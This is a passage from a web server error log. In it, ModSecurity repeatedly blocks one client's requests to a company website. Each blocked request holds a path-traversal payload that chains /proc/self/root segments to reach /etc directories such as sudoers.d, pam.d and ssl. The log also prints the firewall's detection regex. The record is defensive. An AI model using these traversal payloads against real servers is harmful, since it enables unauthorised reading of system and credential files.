[unique_id "abgQ33bQATo66fKoS7xFnQAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:04.723431 2026] [:error] [pid 10831:tid 140411658000128] [client 74.7.243.203:38452] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQ4I6lpbStxTqkSktkoQAAAko"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:05.987323 2026] [:error] [pid 10709:tid 140411725141760] [client 74.7.243.203:38458] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQ4RXjF1vJNtV6CWrvJgAAAcI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:07.375908 2026] [:error] [pid 21806:tid 140411658000128] [client 74.7.243.203:38464] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQ49SswJuvopo3lOhXDQAAAIo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:08.573347 2026] [:error] [pid 10651:tid 140411616036608] [client 74.7.243.203:38472] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQ5LysWC90G-1nBrA8BAAAAY8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:09.871036 2026] [:error] [pid 21946:tid 140411582465792] [client 74.7.243.203:38478] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQ5XbQATo66fKoS7xFnwAAANM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:11.167001 2026] [:error] [pid 21946:tid 140411632822016] [client 74.7.243.203:48922] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQ53bQATo66fKoS7xFoQAAAM0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:12.442794 2026] [:error] [pid 21805:tid 140411565680384] [client 74.7.243.203:48924] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQ6LABkC4fWIHEf8HiwwAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:13.758978 2026] [:error] [pid 21533:tid 140411733534464] [client 74.7.243.203:48926] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQ6XjZBu2q05ozVU9NjgAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:15.047322 2026] [:error] [pid 10709:tid 140411599251200] [client 74.7.243.203:48940] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQ6xXjF1vJNtV6CWrvKAAAAdE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:16.149777 2026] [:error] [pid 10831:tid 140411607643904] [client 74.7.243.203:48942] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQ7I6lpbStxTqkSktkowAAAlA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:17.546020 2026] [:error] [pid 21805:tid 140411582465792] [client 74.7.243.203:48946] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQ7bABkC4fWIHEf8HixAAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:18.826908 2026] [:error] [pid 11972:tid 140411716749056] [client 74.7.243.203:48950] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQ7pqj1wV0Si-Okefi_wAAAAM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:21.159377 2026] [:error] [pid 10772:tid 140411733534464] [client 74.7.243.203:53592] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQ8P9ocpUE4ed4uDzlVgAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:22.496967 2026] [:error] [pid 21805:tid 140411574073088] [client 74.7.243.203:53604] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQ8rABkC4fWIHEf8HixQAAAFQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:23.771179 2026] [:error] [pid 21533:tid 140411632822016] [client 74.7.243.203:53610] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQ83jZBu2q05ozVU9NjwAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:25.081087 2026] [:error] [pid 11972:tid 140411641214720] [client 74.7.243.203:53626] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQ9Zqj1wV0Si-OkefjAAAAAAw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:26.375672 2026] [:error] [pid 32654:tid 140411540502272] [client 74.7.243.203:53636] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQ9glT9VtDQc7bgUyldwAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:27.686189 2026] [:error] [pid 32654:tid 140411674785536] [client 74.7.243.203:53640] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQ9wlT9VtDQc7bgUylegAAAQg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:28.993220 2026] [:error] [pid 32654:tid 140411733534464] [client 74.7.243.203:53654] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQ-AlT9VtDQc7bgUylfAAAAQE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:30.280524 2026] [:error] [pid 11972:tid 140411674785536] [client 74.7.243.203:53030] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQ-pqj1wV0Si-OkefjAQAAAAg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:31.602817 2026] [:error] [pid 21946:tid 140411624429312] [client 74.7.243.203:53034] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQ-3bQATo66fKoS7xFqAAAAM4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
